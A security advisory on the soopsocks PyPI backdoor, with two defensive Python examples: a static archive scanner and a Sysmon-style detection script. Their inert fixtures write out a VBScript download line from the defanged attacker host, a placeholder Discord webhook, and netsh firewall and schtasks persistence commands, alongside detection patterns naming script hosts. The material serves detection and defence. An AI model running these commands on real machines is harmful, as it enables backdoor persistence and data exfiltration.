Alert: Malicious PyPI Package soopsocks Infects 2,653 Systems Before Takedown
A malicious Python package named soopsocks was uploaded to PyPI, posing as a SOCKS5 proxy tool but carrying a backdoor for Windows systems. It was downloaded 2,653 times before removal; PyPI download counts include mirrors and automated scanners, so the number of hosts actually infected is not known. The package drops a Go-compiled executable that runs PowerShell scripts, adds Windows Firewall rules, relaunches itself with elevated privileges, and persists through a Windows service and scheduled tasks. It collects system information and exfiltrates it to a hardcoded Discord webhook. The infection chain also uses a VBScript and a batch script to fetch a legitimate Python interpreter and further payloads from an attacker-controlled domain. The package has been removed, but the case shows how little stands between a newly registered PyPI account and code that executes on developer and build machines. European organizations installing Python packages on Windows endpoints or CI runners are exposed to stealthy backdoor installation and data exfiltration. Mitigation centres on vetting and hash-pinning packages, watching for unusual outbound connections and new listening ports, and blocking script hosts such as wscript.exe and unsigned PowerShell through application control; PowerShell's execution policy on its own is not a security boundary.
AI Analysis
Technical Summary
The soopsocks package was uploaded to PyPI on September 26, 2025, from a newly created account. It advertised SOCKS5 proxy functionality but delivered a Windows backdoor alongside it. The package drops a Go-compiled executable, _AUTORUN.EXE, which does implement a SOCKS5 proxy and in addition runs PowerShell scripts for reconnaissance (among other things reading Internet Explorer security settings and the Windows installation date), adds Windows Firewall rules allowing TCP and UDP on port 1080 so the proxy is reachable from outside, and relaunches itself with elevated privileges. For persistence it registers itself as a Windows service and creates scheduled tasks, so it survives reboots. A companion VBScript, _AUTORUN.VBS, downloads a ZIP archive containing a legitimate Python interpreter from install.soop[.]space on port 6969 and hands off to a batch script that installs and launches the malicious package, so the chain does not depend on whatever Python the victim already has. Collected system information is posted to a hardcoded Discord webhook; because that is ordinary HTTPS to discord.com, it blends in with legitimate traffic. The package was removed after 2,653 downloads. Download counts include mirrors and automated scanners, so the true number of infected hosts is unknown, but any Windows developer workstation or CI runner that installed soopsocks should be treated as compromised. The case is less about sophistication than about the absence of friction: a fresh account, code that runs at install time, and a plausible package name were enough. It points at the controls that matter on both sides: hardened publishing (MFA, short-lived or Trusted Publisher tokens, reviewed CI/CD workflows) and install-time vetting and hash pinning on the consuming side.
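The traits described above (bundled Windows executables and scripts inside a Python package, code wired to run at install time, a hardcoded Discord webhook, downloads from a host on an unusual port) can be checked statically before a package is ever installed. The following is an added example written for this page, not code from the original report or from any vendor tool. It scans a distribution archive (a wheel or sdist ZIP) for those generic indicators; the sample archives it builds are constructed placeholders whose contents are inert, with the report's defanged host install.soop[.]space:6969 used only as a URL string. The rule names and the block/review/allow thresholds are the author's own assumptions, not a published standard.

```python
"""Static triage of a Python distribution archive for soopsocks-style indicators.

Added example for this page; not the original report's or any vendor's code.
It does not fingerprint soopsocks itself. It flags the generic traits the report
describes: bundled Windows binaries/scripts, setup.py hooks that run at install
time, hardcoded Discord webhooks, and downloads from hosts on odd ports.
"""
import io
import re
import zipfile
from dataclasses import dataclass

# File types that have no business inside a pure-Python proxy library.
SUSPICIOUS_EXT = (".exe", ".dll", ".vbs", ".bat", ".cmd", ".ps1", ".scr")
# Members small and text-like enough to run content rules over.
TEXT_EXT = (".py", ".vbs", ".bat", ".cmd", ".ps1", ".txt", ".cfg", ".toml")

DISCORD_WEBHOOK = re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+")
# Any http(s) URL whose host carries an explicit port other than 80 or 443.
URL_ODD_PORT = re.compile(r"https?://[\w.\[\]-]+:(?!80\b|443\b)(\d{2,5})")
# setup.py overriding install/develop/build_py runs arbitrary code during `pip install`.
INSTALL_HOOK = re.compile(r"""cmdclass\s*=\s*\{[^}]*["'](?:install|develop|build_py)["']""", re.S)
SHELL_SPAWN = re.compile(r"(?:subprocess|os\.system|powershell|cscript|wscript|schtasks|netsh\s+advfirewall)", re.I)

# Assumed policy: these rules alone justify blocking; shell spawning only warrants review.
BLOCKING = {"bundled-binary-or-script", "discord-webhook", "install-time-hook", "download-odd-port"}


@dataclass
class Finding:
    path: str
    rule: str
    detail: str


def scan_archive(data: bytes) -> list[Finding]:
    """Return one Finding per indicator hit across all members of a ZIP-based distribution."""
    findings: list[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.endswith("/"):
                continue  # directory entry
            lower = name.lower()
            if lower.endswith(SUSPICIOUS_EXT):
                findings.append(Finding(name, "bundled-binary-or-script", lower.rsplit(".", 1)[-1]))
            if not lower.endswith(TEXT_EXT):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            for m in DISCORD_WEBHOOK.finditer(text):
                findings.append(Finding(name, "discord-webhook", m.group(0)))
            for m in URL_ODD_PORT.finditer(text):
                findings.append(Finding(name, "download-odd-port", m.group(0)))
            if lower.endswith("setup.py") and INSTALL_HOOK.search(text):
                findings.append(Finding(name, "install-time-hook", "cmdclass overrides install/develop/build_py"))
            if lower.endswith(".py") and (m := SHELL_SPAWN.search(text)):
                findings.append(Finding(name, "spawns-shell-or-admin-tool", m.group(0)))
    return findings


def verdict(findings: list[Finding]) -> str:
    """'block' on any blocking rule, 'review' on softer signals, otherwise 'allow'."""
    if any(f.rule in BLOCKING for f in findings):
        return "block"
    return "review" if findings else "allow"


def build_sample_archive() -> bytes:
    """Constructed stand-in mirroring the layout the report describes. Contents are inert placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("soopsocks/__init__.py",
                    "import os, subprocess\n"
                    "def start():\n"
                    "    subprocess.Popen([os.path.join(os.path.dirname(__file__), '_AUTORUN.EXE')])\n")
        zf.writestr("soopsocks/_AUTORUN.EXE", b"MZ\x90\x00placeholder-not-a-real-binary")
        zf.writestr("soopsocks/_AUTORUN.VBS",
                    'Set o = CreateObject("MSXML2.XMLHTTP")\n'
                    'o.Open "GET", "http://install.soop[.]space:6969/python.zip", False\n')
        zf.writestr("soopsocks/report.py",
                    "WEBHOOK = 'https://discord.com/api/webhooks/000000000000000000/constructed_token'\n")
        zf.writestr("setup.py",
                    "from setuptools import setup\nfrom setuptools.command.install import install\n"
                    "class PostInstall(install):\n    def run(self):\n        install.run(self)\n"
                    "setup(name='soopsocks', cmdclass={'install': PostInstall})\n")
    return buf.getvalue()


def build_clean_archive() -> bytes:
    """Constructed benign package: pure sockets, no hooks, no binaries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("okproxy/__init__.py",
                    "import socket\n\ndef connect(host, port):\n    return socket.create_connection((host, port))\n")
        zf.writestr("setup.py", "from setuptools import setup\nsetup(name='okproxy')\n")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_archive(build_sample_archive()):
        print(f"{f.rule:28} {f.path}: {f.detail}")
    print("verdict:", verdict(scan_archive(build_sample_archive())))
```

Run against a real download with `pip download --no-deps --dest . <pkg>` and feed the resulting .whl or .zip bytes to scan_archive. The shell-spawn rule is deliberately soft: many legitimate packages call subprocess, so it lands in "review" rather than "block".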
Potential Impact
For European organizations that build or run Python on Windows, the exposure is direct: the package runs on whatever machine installs it, whether a developer workstation or a CI runner, and it needs no exploit because pip was trusted to execute it. The SOCKS5 proxy, with port 1080 opened in the host firewall, gives the operator a foothold usable for command and control, lateral movement, and tunnelling into internal networks. Privilege elevation and persistence through a service and scheduled tasks make the implant harder to notice and to remove. The reconnaissance output sent to the Discord webhook exposes host and user details, and a proxy on a developer or build machine can reach source repositories, secrets, and internal services, so intellectual property and customer data are in scope. Pipelines that resolve dependencies from PyPI without pinning or vetting are the most exposed, since they will install whatever a name resolves to on the day. Because the package masquerades as an ordinary tool and its exfiltration rides on HTTPS to discord.com, signature-based endpoint defences and port-based egress rules are unlikely to stop it on their own. Consequences range from operational disruption and incident-response cost to GDPR notification duties where personal data is touched, and reputational damage.
Mitigation Recommendations
European organizations should tighten how open-source packages enter and run in their environments:
1) Verify package provenance and pin dependencies by hash (for pip, a lock file with hashes installed with --require-hashes), and resolve packages through an internal mirror or proxy that only serves vetted versions. Treat a brand-new package from a newly registered account as unvetted by default.
2) Scan dependencies before deployment for known malicious indicators and behavioural anomalies: bundled executables or scripts, setup hooks that run at install time, hardcoded webhooks, and downloads from hosts on non-standard ports.
3) Restrict script hosts with application control (AppLocker or WDAC) rather than PowerShell execution policy alone; execution policy is a convenience setting and is trivially bypassed. Block or constrain wscript.exe and cscript.exe where VBScript is not needed, and alert on script hosts spawned by python.exe or pip.
4) Monitor network traffic for unusual outbound connections and new inbound listeners. Port-based rules are not enough here: the exfiltration goes to discord.com over HTTPS, so look for non-browser processes posting to discord.com/api/webhooks, for outbound connections to high ports such as 6969, and for Windows Firewall rules being added for TCP/UDP 1080.
5) Apply least privilege so that a user-level process cannot silently elevate, add firewall rules, install services, or create scheduled tasks; UAC prompts triggered by a package install deserve investigation, not approval.
6) Harden publishing and CI/CD: MFA on package-index accounts, short-lived or Trusted Publisher tokens instead of long-lived API tokens, and granular access to publishing workflows.
7) Educate developers on supply-chain risk and consider install-time blockers such as Socket Firewall or comparable tools that refuse known-bad packages before setup code runs.
8) Audit scheduled tasks and services regularly against a baseline (for example diffing Get-ScheduledTask and Get-Service output), looking for entries whose executable lives under a user profile or a Python site-packages directory.
9) Keep EDR current and tuned to flag script execution from unexpected parents, firewall and service changes by non-administrative tooling, and privilege-escalation attempts.
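Recommendations 3, 4, 5, 8 and 9 above reduce to a handful of host-telemetry detections, and the value comes from seeing them co-occur on one machine rather than from any one of them alone. The following is an added example written for this page, not the original report's or any vendor product's detection content. It evaluates Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records; the field names follow Sysmon's schema, but every event below is constructed, the paths and host names are made up, and the download host is a reserved .invalid name standing in for the report's install.soop[.]space:6969. The detection names and the "two distinct detections per host" alert threshold are assumptions of this example.

```python
"""Detection logic for the soopsocks-style behaviour chain over host telemetry.

Added example for this page; not the original report's or any vendor's rules.
Runs over constructed Sysmon-style records (EventID 1 process create, EventID 3
network connect). Field names follow Sysmon's schema; all values are made up.
"""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
PYTHON_IMAGES = {"python.exe", "pythonw.exe", "pip.exe"}
# Processes expected to talk to Discord; anything else doing so deserves a look.
DISCORD_CLIENTS = {"discord.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

RE_FW_1080 = re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule.*localport=1080", re.I)
RE_PERSIST = re.compile(r"\b(?:schtasks(?:\.exe)?\s+/create|sc(?:\.exe)?\s+create)\b", re.I)
RE_AUTORUN = re.compile(r"_AUTORUN\.(?:EXE|VBS)\b", re.I)  # file names named in the report


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_discord(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ("discord.com", "discordapp.com"))


def evaluate(event: dict) -> list[str]:
    """Names of the detections that fire on one event (empty list if none)."""
    hits: list[str] = []
    if event.get("EventID") == 1:
        img = basename(event.get("Image", ""))
        parent = basename(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "")
        if parent in PYTHON_IMAGES and img in SCRIPT_HOSTS:
            hits.append("script-host-spawned-by-python")
        if RE_FW_1080.search(cmd):
            hits.append("firewall-allow-1080-added")
        if RE_PERSIST.search(cmd) and RE_AUTORUN.search(cmd):
            hits.append("persistence-points-at-autorun")
        if RE_AUTORUN.search(img):
            hits.append("autorun-executable-started")
    elif event.get("EventID") == 3 and str(event.get("Initiated", "true")).lower() == "true":
        img = basename(event.get("Image", ""))
        host = event.get("DestinationHostname", "")
        port = int(event.get("DestinationPort", 0))
        if is_discord(host) and img not in DISCORD_CLIENTS:
            hits.append("non-browser-discord-connection")
        if port not in (53, 80, 443) and img in SCRIPT_HOSTS:
            hits.append("script-host-outbound-odd-port")
    return hits


def correlate(events: list[dict], min_distinct: int = 2) -> dict[str, list[str]]:
    """Group detections per host; alert only where several distinct ones co-occur."""
    per_host: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        for name in evaluate(ev):
            per_host[ev.get("Computer", "?")].add(name)
    return {h: sorted(n) for h, n in per_host.items() if len(n) >= min_distinct}


# Constructed telemetry. SITE and PY are made-up paths, not indicators from the report.
SITE = r"C:\Users\dev\AppData\Local\Programs\Python\Python312\Lib\site-packages\soopsocks"
PY = r"C:\Users\dev\AppData\Local\Programs\Python\Python312\python.exe"
SAMPLE_EVENTS = [
    # python spawns the script host to run the dropped VBScript
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": PY,
     "CommandLine": f'wscript.exe "{SITE}\\_AUTORUN.VBS"'},
    # the VBScript fetches a ZIP from a high, non-standard port
    {"EventID": 3, "Computer": "WS01", "Image": r"C:\Windows\System32\wscript.exe", "Initiated": "true",
     "DestinationHostname": "install.example.invalid", "DestinationPort": "6969"},
    # the dropped Go binary starts
    {"EventID": 1, "Computer": "WS01", "Image": f"{SITE}\\_AUTORUN.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": f'"{SITE}\\_AUTORUN.EXE"'},
    # it opens 1080 in the host firewall
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\netsh.exe", "ParentImage": f"{SITE}\\_AUTORUN.EXE",
     "CommandLine": 'netsh advfirewall firewall add rule name="socks" dir=in action=allow protocol=TCP localport=1080'},
    # and persists through a scheduled task
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": f"{SITE}\\_AUTORUN.EXE",
     "CommandLine": f'schtasks /create /tn "socks" /tr "{SITE}\\_AUTORUN.EXE" /sc onlogon'},
    # exfiltration to a Discord webhook rides on ordinary HTTPS
    {"EventID": 3, "Computer": "WS01", "Image": f"{SITE}\\_AUTORUN.EXE", "Initiated": "true",
     "DestinationHostname": "discord.com", "DestinationPort": "443"},
    # benign noise on another host: a browser on Discord, an admin script from Explorer
    {"EventID": 3, "Computer": "WS02", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Initiated": "true", "DestinationHostname": "discord.com", "DestinationPort": "443"},
    {"EventID": 1, "Computer": "WS02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for host, names in correlate(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(names))
```

The per-event checks are individually noisy (a browser on discord.com, an admin running schtasks), which is why correlate only raises an alert when at least two distinct detections land on the same host; on the constructed data WS01 trips all six and WS02 none. EventID 3 carries DestinationHostname only when Sysmon's DNS lookup is enabled; without it, match on destination IP ranges or on proxy logs instead.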
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden
Technical Details
- Article Source: https://thehackernews.com/2025/10/alert-malicious-pypi-package-soopsocks.html (fetched 2025-10-07T01:05:08.960Z, 1168 words)
Threat ID: 68e467466a45552f36e85b49
Added to database: 10/7/2025, 1:05:10 AM
Last enriched: 10/7/2025, 1:08:43 AM
Last updated: 10/7/2025, 8:22:06 AM